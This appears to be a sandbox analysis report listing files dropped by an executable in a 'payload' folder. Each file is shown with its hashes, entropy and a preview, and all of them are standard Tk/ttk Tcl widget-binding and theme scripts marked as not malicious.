                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Combobox bindings...#..# <<NOTE-WM-TRANSIENT>>:..#..#.Need to set [wm transient] just before mapping the popdown..#.instead of when it's created, in case a containing frame..#.has been reparented [#1818441]...#..#.On Windows: setting [wm transient] prevents the parent..#.toplevel from becoming inactive when the popdown is posted..#.(Tk 8.4.8+)..#..#.On X11: WM_TRANSIENT_FOR on override-redirect windows..#.may be used by compositing managers and by EWMH-aware..#.window managers (even though the older ICCCM spec says..#.it's meaningless)...#..#.On OSX: [wm transient] does utterly the wrong thing...#.Instead, we use [MacWindowStyle "help" "noActivates hideOnSuspend"]...#.The "noActivates" attribute prevents the parent toplevel..#.from deactivating when the popdown is posted, and is also..#.necessary for "help" windows to receive mouse events...#."hideOnSuspend" makes the popdown disappear (resp. reappear)..#.when the parent toplevel is deactivated (resp. reactivated)...#.(see [#18147
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4674
                                                                                                                                                                                                                                            Entropy (8bit):4.836935825704301
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DRYEqfLDxGmxGUetobPT6t6brv0q3O4Uxz0:DWEqTDbxdKobPqe5PUxw
                                                                                                                                                                                                                                            MD5:1A799FE3754307A5AADE98C367E2F5D7
                                                                                                                                                                                                                                            SHA1:C64BE4B77F0D298610F4EE20FCEBBAEE3C8B5F22
                                                                                                                                                                                                                                            SHA-256:5B33F32B0139663347D6CF70A5A838F8E4554E0E881E97C8478B77733162EA73
                                                                                                                                                                                                                                            SHA-512:89F367F9A59730BCDFC5ABDE0E35A10B72A1F19C68A768BA4524C938EF5C5CAF094C1BFA8FC74173F65201F6617544223C2143252A9F691EE9AAA7543315179F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Map symbolic cursor names to platform-appropriate cursors...#..# The following cursors are defined:..#..#.standard.-- default cursor for most controls..#.""..-- inherit cursor from parent window..#.none..-- no cursor..#..#.text..-- editable widgets (entry, text)..#.link..-- hyperlinks within text..#.crosshair.-- graphic selection, fine control..#.busy..-- operation in progress..#.forbidden.-- action not allowed..#..#.hresize..-- horizontal resizing..#.vresize..-- vertical resizing..#..# Also resize cursors for each of the compass points,..# {nw,n,ne,w,e,sw,s,se}resize...#..# Platform notes:..#..# Windows doesn't distinguish resizing at the 8 compass points,..# only horizontal, vertical, and the two diagonals...#..# OSX doesn't have resize cursors for nw, ne, sw, or se corners...# We use the Tk-defined X11 fallbacks for these...#..# X11 doesn't have a "forbidden" cursor (usually a slashed circle);..# "pirate" seems to be the conventional cursor for this purpose...#..# Windows has a
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4553
                                                                                                                                                                                                                                            Entropy (8bit):4.933885986949396
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lNl3u3lCFUeuMGN3xbVJU+N3xbVJh3IwxkxlBqatUrtY:zl3ZUe9GN3NVC+N3NVjqntUZY
                                                                                                                                                                                                                                            MD5:FC79F42761D63172163C08F0F5C94436
                                                                                                                                                                                                                                            SHA1:AABAB4061597D0D6DC371F46D14AAA1A859096DF
                                                                                                                                                                                                                                            SHA-256:49AE8FAF169165BDDAF01D50B52943EBAB3656E9468292B7890BE143D0FCBC91
                                                                                                                                                                                                                                            SHA-512:F619834A95C9DEB93F8184BCC437D701A961C77E24A831ADBD5C145556D26986BFDA2A6ACB9E8784F8B2380E122D12AC893EB1B6ACF03098922889497E1FF9EA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Settings for default theme...#....namespace eval ttk::theme::default {.. variable colors.. array set colors {...-frame..."#d9d9d9"...-foreground.."#000000"...-window..."#ffffff"...-text .."#000000"...-activebg.."#ececec"...-selectbg.."#4a6984"...-selectfg.."#ffffff"...-darker .."#c3c3c3"...-disabledfg.."#a3a3a3"...-indicator.."#4a6984"...-disabledindicator."#a3a3a3"...-altindicator.."#9fbdd8"...-disabledaltindicator."#c0c0c0".. }.... ttk::style theme settings default {.....ttk::style configure "." \... -borderwidth .1 \... -background .$colors(-frame) \... -foreground .$colors(-foreground) \... -troughcolor .$colors(-darker) \... -font ..TkDefaultFont \... -selectborderwidth.1 \... -selectbackground.$colors(-selectbg) \... -selectforeground.$colors(-selectfg) \... -insertwidth .1 \... -indicatordiameter.10 \... ;.....ttk::style map "." -background \... [list disabled $colors(-frame) active $colors(-activebg)]...ttk::style map "."
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17658
                                                                                                                                                                                                                                            Entropy (8bit):5.026830367336785
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:sca9Jzcyzf6yzwO+v+iPT3vKof8q3YIuR13a:sT9Jzcy76wiV3YNa
                                                                                                                                                                                                                                            MD5:7FFD7A32C7F8E234763E99E3357DB624
                                                                                                                                                                                                                                            SHA1:67C67557F3A6DC8B240E85D46F6B733FEE45A013
                                                                                                                                                                                                                                            SHA-256:266553EB9EED333DD836BA96204AE008F10686F4F12C404187F1E01CAB65D246
                                                                                                                                                                                                                                            SHA-512:D18B73E44F37ED92B9FD7C1F6510285D1280EB5BC665B46996E538924E9D1CAD63337279BF92587132C3AEA497325A17CCE671EA59537B350F6D921C25346F39
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# DERIVED FROM: tk/library/entry.tcl r1.22..#..# Copyright (c) 1992-1994 The Regents of the University of California...# Copyright (c) 1994-1997 Sun Microsystems, Inc...# Copyright (c) 2004, Joe English..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....namespace eval ttk {.. namespace eval entry {...variable State.....set State(x) 0...set State(selectMode) none...set State(anchor) 0...set State(scanX) 0...set State(scanIndex) 0...set State(scanMoved) 0.....# Button-2 scan speed is (scanNum/scanDen) characters...# per pixel of mouse movement....# The standard Tk entry widget uses the equivalent of...# scanNum = 10, scanDen = average character width....# I don't know why that was chosen....#...set State(scanNum) 1...set State(scanDen) 1...set State(deadband) 3.;# #pixels for mouse-moved deadband... }..}....### Option database settings...#..option add *TEntry.cursor [ttk::cursor text] widg
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5732
                                                                                                                                                                                                                                            Entropy (8bit):5.001928619185109
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:NzEh94ntnVU8Z/1LkAKgW22SeLMQR8hzcksejmOF4ytZm:Sh9ahV3ZWAKgWDfktm
                                                                                                                                                                                                                                            MD5:80331FCBE4C049FF1A0D0B879CB208DE
                                                                                                                                                                                                                                            SHA1:4EB3EFDFE3731BD1AE9FD52CE32B1359241F13CF
                                                                                                                                                                                                                                            SHA-256:B94C319E5A557A5665B1676D602B6495C0887C5BACF7FA5B776200112978BB7B
                                                                                                                                                                                                                                            SHA-512:A4BD2D91801C121A880225F1F3D0C4E30BF127190CF375F6F7A49EB4239A35C49C44F453D6D3610DF0D6A7B3CB15F4E79BD9C129025CC496CEB856FCC4B6DE87
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Font specifications...#..# This file, [source]d at initialization time, sets up the following..# symbolic fonts based on the current platform:..#..# TkDefaultFont.-- default for GUI items not otherwise specified..# TkTextFont.-- font for user text (entry, listbox, others)..# TkFixedFont.-- standard fixed width font..# TkHeadingFont.-- headings (column headings, etc)..# TkCaptionFont -- dialog captions (primary text in alert dialogs, etc.)..# TkTooltipFont.-- font to use for tooltip windows..# TkIconFont.-- font to use for icon captions..# TkMenuFont.-- used to use for menu items..#..# In Tk 8.5, some of these fonts may be provided by the TIP#145 implementation..# (On Windows and Mac OS X as of Oct 2007)...#..# +++ Platform notes:..#..# Windows:..#.The default system font changed from "MS Sans Serif" to "Tahoma"..# .in Windows XP/Windows 2000...#..#.MS documentation says to use "Tahoma 8" in Windows 2000/XP,..#.although many MS programs still use "MS Sans Serif 8"..#..#.Should use
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6443
                                                                                                                                                                                                                                            Entropy (8bit):4.9213750923402735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:toMcJQkmcE6fNuLyiCzSLSRwgppdT3kXdpK3dpKkSH2tOTjvAG:tRc6kFbcH2pyXz+zO2y
                                                                                                                                                                                                                                            MD5:F11A76FBABF35E446A1200A5A7A6730A
                                                                                                                                                                                                                                            SHA1:4CBAB3507C1EF275691C98620D2B5CEEB9043B3E
                                                                                                                                                                                                                                            SHA-256:54663FBF524CAD9D74AB1EC44B7FDDE0B87F06E5347191962C97F51F714E29BB
                                                                                                                                                                                                                                            SHA-512:95471D1519AE663EC7EB4639D847019E0C9F70DEA2B0680D81FB8BBE7CD1FF643A3DF5E06CA2CC54385BE094BDCC64AB0F1AA1652F91D16C4EF7B68CB670371E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for Menubuttons...#..# Menubuttons have three interaction modes:..#..# Pulldown: Press menubutton, drag over menu, release to activate menu entry..# Popdown: Click menubutton to post menu..# Keyboard: <space> or accelerator key to post menu..#..# (In addition, when menu system is active, "dropdown" -- menu posts..# on mouse-over. Ttk menubuttons don't implement this)...#..# For keyboard and popdown mode, we hand off to tk_popup and let..# the built-in Tk bindings handle the rest of the interaction...#..# ON X11:..#..# Standard Tk menubuttons use a global grab on the menubutton...# This won't work for Ttk menubuttons in pulldown mode,..# since we need to process the final <ButtonRelease> event,..# and this might be delivered to the menu. So instead we..# rely on the passive grab that occurs on <Button> events,..# and transition to popdown mode when the mouse is released..# or dragged outside the menubutton...#..# ON WINDOWS:..#..# I'm not sure what the hell is going on h
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5825
                                                                                                                                                                                                                                            Entropy (8bit):4.96378772387536
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:RErUhyi5JeUQBWdz6eP8ClR6/u6AsBmPNNiREUkheLY1EVL23sN2JJjQdD:6uyiyDQBP8q6/u6AUREUsNEVq3y2jkdD
                                                                                                                                                                                                                                            MD5:F811F3E46A4EFA73292F40D1CDDD265D
                                                                                                                                                                                                                                            SHA1:7FC70A1984555672653A0840499954B854F27920
                                                                                                                                                                                                                                            SHA-256:22264D8D138E2C0E9A950305B4F08557C5A73F054F8215C0D8CE03854042BE76
                                                                                                                                                                                                                                            SHA-512:4424B7C687EB9B1804ED3B1C685F19D4D349753B374D9046240F937785C9713E8A760ADA46CB628C15F9C7983CE4A7987691C968330478C9C1A9B74E953E40AC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for TNotebook widget..#....namespace eval ttk::notebook {.. variable TLNotebooks ;# See enableTraversal..}....bind TNotebook <Button-1>..{ ttk::notebook::Press %W %x %y }..bind TNotebook <Right>...{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Left>...{ ttk::notebook::CycleTab %W -1; break }..bind TNotebook <Control-Tab>..{ ttk::notebook::CycleTab %W 1; break }..bind TNotebook <Control-Shift-Tab>.{ ttk::notebook::CycleTab %W -1; break }..catch {..bind TNotebook <Control-ISO_Left_Tab>.{ ttk::notebook::CycleTab %W -1; break }..}..bind TNotebook <Destroy>..{ ttk::notebook::Cleanup %W }....# ActivateTab $nb $tab --..#.Select the specified tab and set focus...#..# Desired behavior:..#.+ take focus when reselecting the currently-selected tab;..#.+ keep focus if the notebook already has it;..#.+ otherwise set focus to the first traversable widget..#. in the newly-selected tab;..#.+ do not leave the focus in a deselected tab...#..proc ttk::notebook::ActivateTab {
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2274
                                                                                                                                                                                                                                            Entropy (8bit):4.951790637542993
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:zVAqE3ZF8b4rXzsqAOAXsmCLFeNqkFeNXez:zLeU4bzSs1M
                                                                                                                                                                                                                                            MD5:848A62BCF6ED3C16A8CFD26C43E1BC4E
                                                                                                                                                                                                                                            SHA1:6F5E3EDF62716B511CF575BE2C6C997AFA2FA1E7
                                                                                                                                                                                                                                            SHA-256:20EE6AD9D701709724292A926AF93C93784B254B48A656ECC140EF3A0FE10A11
                                                                                                                                                                                                                                            SHA-512:AE78028EAF96E5B77DEFF0CD655360DB3A8058AC98B6753D9B77D629EDFFC582999A22A7075B9F5BA83EE65DA093E2CCB0EEAA4049898910D7AF517FDE60B28E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for ttk::panedwindow widget...#....namespace eval ttk::panedwindow {.. variable State.. array set State {...pressed 0.. .pressX.-...pressY.-...sash .-...sashPos -.. }..}....## Bindings:..#..bind TPanedwindow <Button-1> ..{ ttk::panedwindow::Press %W %x %y }..bind TPanedwindow <B1-Motion>..{ ttk::panedwindow::Drag %W %x %y }..bind TPanedwindow <ButtonRelease-1> .{ ttk::panedwindow::Release %W %x %y }....bind TPanedwindow <Motion> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Enter> ..{ ttk::panedwindow::SetCursor %W %x %y }..bind TPanedwindow <Leave> ..{ ttk::panedwindow::ResetCursor %W }..# See <<NOTE-PW-LEAVE-NOTIFYINFERIOR>>..bind TPanedwindow <<EnteredChild>>.{ ttk::panedwindow::ResetCursor %W }....## Sash movement:..#..proc ttk::panedwindow::Press {w x y} {.. variable State.... set sash [$w identify $x $y].. if {$sash eq ""} {.. .set State(pressed) 0...return.. }.. set State(pressed) .1.. set State(pressX) .$x.. set
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1138
                                                                                                                                                                                                                                            Entropy (8bit):4.763501917862434
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:nJ8v3O0NSiio0pNFVkIks0ImxlnINgDImSgGINSyWghT:JFqS/o03fkxs0Rn+gD4v+S2F
                                                                                                                                                                                                                                            MD5:DBF3BF0E8F04E9435E9561F740DFC700
                                                                                                                                                                                                                                            SHA1:C7619A05A834EFB901C57DCFEC2C9E625F42428F
                                                                                                                                                                                                                                            SHA-256:697CC0A75AE31FE9C2D85FB25DCA0AFA5D0DF9C523A2DFAD2E4A36893BE75FBA
                                                                                                                                                                                                                                            SHA-512:D3B323DFB3EAC4A78DA2381405925C131A99C6806AF6FD8041102162A44E48BF166982A4AE4AA142A14601736716F1A628D9587E292FA8E4842BE984374CC192
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Ttk widget set: progress bar utilities...#....namespace eval ttk::progressbar {.. variable Timers.;# Map: widget name -> after ID..}....# Autoincrement --..#.Periodic callback procedure for autoincrement mode..#..proc ttk::progressbar::Autoincrement {pb steptime stepsize} {.. variable Timers.... if {![winfo exists $pb]} {.. .# widget has been destroyed -- cancel timer...unset -nocomplain Timers($pb)...return.. }.... set Timers($pb) [after $steptime \.. .[list ttk::progressbar::Autoincrement $pb $steptime $stepsize] ].... $pb step $stepsize..}....# ttk::progressbar::start --..#.Start autoincrement mode. Invoked by [$pb start] widget code...#..proc ttk::progressbar::start {pb {steptime 50} {stepsize 1}} {.. variable Timers.. if {![info exists Timers($pb)]} {...Autoincrement $pb $steptime $stepsize.. }..}....# ttk::progressbar::stop --..#.Cancel autoincrement mode. Invoked by [$pb stop] widget code...#..proc ttk::progressbar::stop {pb} {.. variabl
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2787
                                                                                                                                                                                                                                            Entropy (8bit):4.795451191784129
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:IKADAzizZIcAlRqucObmn4AzyVN2AJyhAzukPNP:IHIBRqupmLSZkklP
                                                                                                                                                                                                                                            MD5:F1C33CC2D47115BBECD2E7C2FCB631A7
                                                                                                                                                                                                                                            SHA1:0123A961242ED8049B37C77C726DB8DBD94C1023
                                                                                                                                                                                                                                            SHA-256:B909ADD0B87FA8EE08FD731041907212A8A0939D37D2FF9B2F600CD67DABD4BB
                                                                                                                                                                                                                                            SHA-512:96587A8C3555DA1D810010C10C516CE5CCAB071557A3C8D9BD65C647C7D4AD0E35CBED0788F1D72BAFAC8C84C7E2703FC747F70D9C95F720745A1FC4A701C544
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# scale.tcl - Copyright (C) 2004 Pat Thoyts <patthoyts@users.sourceforge.net>..#..# Bindings for the TScale widget....namespace eval ttk::scale {.. variable State.. array set State {...dragging 0.. }..}....bind TScale <Button-1> { ttk::scale::Press %W %x %y }..bind TScale <B1-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-1> { ttk::scale::Release %W %x %y }....bind TScale <Button-2> { ttk::scale::Jump %W %x %y }..bind TScale <B2-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-2> { ttk::scale::Release %W %x %y }....bind TScale <Button-3> { ttk::scale::Jump %W %x %y }..bind TScale <B3-Motion> { ttk::scale::Drag %W %x %y }..bind TScale <ButtonRelease-3> { ttk::scale::Release %W %x %y }....## Keyboard navigation bindings:..#..bind TScale <<LineStart>> { %W set [%W cget -from] }..bind TScale <<LineEnd>> { %W set [%W cget -to] }....bind TScale <<PrevChar>> { ttk::scale::Increment %W -1 }..bin
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3285
                                                                                                                                                                                                                                            Entropy (8bit):4.979174619784594
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:tyASEji8RYQ8FGD7BDos9Q1TBfvq/HKTh9lkHv8T/mAezeLEAAFULxZh4x:eIi8qFu2d11XlhfkPcczeLS4Zm
                                                                                                                                                                                                                                            MD5:3FB31A225CEC64B720B8E579582F2749
                                                                                                                                                                                                                                            SHA1:9C0151D9E2543C217CF8699FF5D4299A72E8F13C
                                                                                                                                                                                                                                            SHA-256:6EAA336B13815A7FC18BCD6B9ADF722E794DA2888D053C229044784C8C8E9DE8
                                                                                                                                                                                                                                            SHA-512:E6865655585E3D2D6839B56811F3FD86B454E8CD44E258BB1AC576AD245FF8A4D49FBB7F43458BA8A6C9DAAC8DFA923A176F0DD8A9976A11BEA09E6E2D17BF45
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Bindings for TScrollbar widget..#....namespace eval ttk::scrollbar {.. variable State.. # State(xPress).--.. # State(yPress).-- initial position of mouse at start of drag... # State(first).-- value of -first at start of drag...}....bind TScrollbar <Button-1> ..{ ttk::scrollbar::Press %W %x %y }..bind TScrollbar <B1-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-1>.{ ttk::scrollbar::Release %W %x %y }....bind TScrollbar <Button-2> ..{ ttk::scrollbar::Jump %W %x %y }..bind TScrollbar <B2-Motion>..{ ttk::scrollbar::Drag %W %x %y }..bind TScrollbar <ButtonRelease-2>.{ ttk::scrollbar::Release %W %x %y }....# Redirect scrollwheel bindings to the scrollbar widget..#..# The shift-bindings scroll left/right (not up/down)..# if a widget has both possibilities..set eventList [list <MouseWheel> <Shift-MouseWheel>]..switch [tk windowingsystem] {.. aqua {.. lappend eventList <Option-MouseWheel> <Shift-Option-MouseWheel>.. }.. x11 {..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2503
                                                                                                                                                                                                                                            Entropy (8bit):4.830288003879418
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:naLvMnAqeYQWYh7FvBrrbnMCfY/aVAbAigWAuFM0PfWAX20:nWQapprPnJY/8A8iRFdPtj
                                                                                                                                                                                                                                            MD5:DD6A1737B14D3F7B2A0B4F8BE99C30AF
                                                                                                                                                                                                                                            SHA1:E6B06895317E73CD3DC78234DD74C74F3DB8C105
                                                                                                                                                                                                                                            SHA-256:E92D77B5CDCA2206376DB2129E87E3D744B3D5E31FDE6C0BBD44A494A6845CE1
                                                                                                                                                                                                                                            SHA-512:B74AE92EDD53652F8A3DB0D84C18F9CE9069805BCAB0D3C2DBB537D7C241AA2681DA69B699D88A10029798D7B5BC015682F64699BA475AE6A379EEF23B48DAAF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# Sizegrip widget bindings...#..# Dragging a sizegrip widget resizes the containing toplevel...#..# NOTE: the sizegrip widget must be in the lower right hand corner...#....switch -- [tk windowingsystem] {.. x11 -.. win32 {...option add *TSizegrip.cursor [ttk::cursor seresize] widgetDefault.. }.. aqua {.. .# Aqua sizegrips use default Arrow cursor... }..}....namespace eval ttk::sizegrip {.. variable State.. array set State {...pressed .0...pressX ..0...pressY ..0...width ..0...height ..0...widthInc.1...heightInc.1.. resizeX 1.. resizeY 1...toplevel .{}.. }..}....bind TSizegrip <Button-1> ..{ ttk::sizegrip::Press.%W %X %Y }..bind TSizegrip <B1-Motion> ..{ ttk::sizegrip::Drag .%W %X %Y }..bind TSizegrip <ButtonRelease-1> .{ ttk::sizegrip::Release %W %X %Y }....proc ttk::sizegrip::Press {W X Y} {.. variable State.... if {[$W instate disabled]} { return }.... set top [winfo toplevel $W].... # If the toplevel is not resi
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5003
                                                                                                                                                                                                                                            Entropy (8bit):5.055050310142795
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:1qg/+yrjqA/K5ytxm1J1Ve6J1yQLUAzz/S76hrwxGGe2F:N/+yr2Gk1J1Ve6fxUAzDS76hrwxs2F
                                                                                                                                                                                                                                            MD5:9C2833FAA9248F09BC2E6AB1BA326D59
                                                                                                                                                                                                                                            SHA1:F13CF048FD706BBB1581DC80E33D1AAD910D93E8
                                                                                                                                                                                                                                            SHA-256:DF286BB59F471AA1E19DF39AF0EF7AA84DF9F04DC4A439A747DD8BA43C300150
                                                                                                                                                                                                                                            SHA-512:5FF3BE1E3D651C145950C3FC5B8C2E842211C937D1042173964383D4D59ECF5DD0EC39FF7771D029716F2D895F0B1A72591EF3BF7947FE64D4D6DB5F0B8ABFFB
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# ttk::spinbox bindings..#....namespace eval ttk::spinbox { }....### Spinbox bindings...#..# Duplicate the Entry bindings, override if needed:..#....ttk::copyBindings TEntry TSpinbox....bind TSpinbox <Motion>...{ ttk::spinbox::Motion %W %x %y }..bind TSpinbox <Button-1> ..{ ttk::spinbox::Press %W %x %y }..bind TSpinbox <ButtonRelease-1> .{ ttk::spinbox::Release %W }..bind TSpinbox <Double-Button-1> .{ ttk::spinbox::DoubleClick %W %x %y }..bind TSpinbox <Triple-Button-1> .{} ;# disable TEntry triple-click....bind TSpinbox <Up>...{ event generate %W <<Increment>> }..bind TSpinbox <Down> ...{ event generate %W <<Decrement>> }....bind TSpinbox <<Increment>>..{ ttk::spinbox::Spin %W +1 }..bind TSpinbox <<Decrement>> ..{ ttk::spinbox::Spin %W -1 }....ttk::bindMouseWheel TSpinbox ..[list ttk::spinbox::MouseWheel %W]....## Motion --..#.Sets cursor...#..proc ttk::spinbox::Motion {w x y} {.. variable State.. ttk::saveCursor $w State(userConfCursor) [ttk::cursor text].. if { [$w ide
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10180
                                                                                                                                                                                                                                            Entropy (8bit):4.886259798213254
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:FoTvMxHZZ1u2xj7+ZBHxjiXJv9IfwW+vr3UxjXEJDTF/MyLF3JcMzlsra2tYGa5P:mImAkRKYXMH59o4UbS30LWb
                                                                                                                                                                                                                                            MD5:F705B3A292D02061DA0ABB4A8DD24077
                                                                                                                                                                                                                                            SHA1:FD75C2250F6F66435444F7DEEF383C6397ED2368
                                                                                                                                                                                                                                            SHA-256:C88B60FFB0F72E095F6FC9786930ADD7F9ED049EABC713F889F9A7DA516E188C
                                                                                                                                                                                                                                            SHA-512:09817638DD3D3D5C57FA630C7EDF2F19C3956C9BD264DBF07627FA14A03AECD22D5A5319806E49EF1030204FADEF17C57CE8EAE4378A319AD2093321D9151C8F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:#..# ttk::treeview widget bindings and utilities...#....namespace eval ttk::treeview {.. variable State.... # Enter/Leave/Motion.. #.. set State(activeWidget) .{}.. set State(activeHeading) .{}.... # Press/drag/release:.. #.. set State(pressMode) .none.. set State(pressX)..0.... # For pressMode == "resize".. set State(resizeColumn).#0.... # For pressmode == "heading".. set State(heading) .{}..}....### Widget bindings...#....bind Treeview.<Motion> ..{ ttk::treeview::Motion %W %x %y }..bind Treeview.<B1-Leave>..{ #nothing }..bind Treeview.<Leave>...{ ttk::treeview::ActivateHeading {} {}}..bind Treeview.<Button-1> ..{ ttk::treeview::Press %W %x %y }..bind Treeview.<Double-Button-1> .{ ttk::treeview::DoubleClick %W %x %y }..bind Treeview.<ButtonRelease-1> .{ ttk::treeview::Release %W %x %y }..bind Treeview.<B1-Motion> ..{ ttk::treeview::Drag %W %x %y }..bind Treeview .<Up> ..{ ttk::treeview::Keynav %W up }..bind Treeview .<Down> ..{ ttk::treeview
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4993
                                                                                                                                                                                                                                            Entropy (8bit):4.954034141173847
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:lfxukTy5jPTq8LIgF2diyNTNR6nkrn4ijSSvNigyJ5612HtZG835MSvWOTRsHWU:BM+y5jrq8G/2nkEijSSvNigyJ5612Htw
                                                                                                                                                                                                                                            MD5:AF45B2C8B43596D1BDECA5233126BD14
                                                                                                                                                                                                                                            SHA1:A99E75D299C4579E10FCDD59389B98C662281A26
                                                                                                                                                                                                                                            SHA-256:2C48343B1A47F472D1A6B9EE8D670CE7FB428DB0DB7244DC323FF4C7A8B4F64B
                                                                                                                                                                                                                                            SHA-512:C8A8D01C61774321778AB149F6CA8DDA68DB69133CB5BA7C91938E4FD564160ECDCEC473222AFFB241304A9ACC73A36B134B3A602FD3587C711F2ADBB64AFA80
                                                                                                                                                                                                                                            Malicious:false
